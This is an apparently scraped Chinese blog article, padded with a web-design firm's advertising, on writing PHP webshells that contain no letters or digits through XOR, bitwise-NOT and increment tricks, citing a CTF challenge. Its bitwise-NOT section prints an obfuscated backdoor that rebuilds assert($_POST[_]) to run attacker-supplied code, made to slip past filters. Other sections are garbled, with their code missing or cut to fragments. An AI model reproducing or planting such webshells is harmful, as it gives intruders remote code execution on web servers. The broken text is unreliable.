小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!
创新互联专注于企业全网营销推广、网站重做改版、蓬安网站定制设计、自适应品牌网站建设、H5技术、商城网站建设、集团公司官网建设、成都外贸网站建设、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为蓬安等各大城市提供网站开发制作服务。
一、使用异或 ^ 运算
这个马是不能直接用的,因为代码中的url编码其实对应的是一个不可打印的特殊字符,这里只是为了显示程序方便,作者用url编码来取代,实际上木马应该是下面这个样子:
或者你还可以按照如下两种形式修改木马,使得木马可以运行。
二、使用取反 ~ 运算
'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[_]);// assert($_POST[_]);前两天的SUCTF就考察了这个,但是需要对代码稍作修改。原题目可以写入特殊字符只有: ~ $ _ ; = ( ) ,修改如下:(PS:代码由 Wfox 师傅fuzz出来,也是参考P牛的文章 )
fuzz脚本如下:
';
}
?>
赛后官方也提供了WP,PHP中使用按位取反(~)函数创建后门 。按照这篇文章,没有成功生成可用的shell,于是我又参考了另外一篇文章 Deformity PHP Webshell、Webshell Hidden Learning ,生成脚本如下:
# generate.php 运行该程序,生成木马shell.php, assert('eval($_POST[_])');
')
?>
三、使用自增运算 ++
看完了这篇文章,相信你对“如何实现不包含数字字母的WebShell”有了一定的了解,如果想了解更多相关知识,欢迎关注创新互联行业资讯频道,感谢各位的阅读!
文章标题:如何实现不包含数字字母的WebShell
网站网址:http://cdkjz.cn/article/gssdph.html
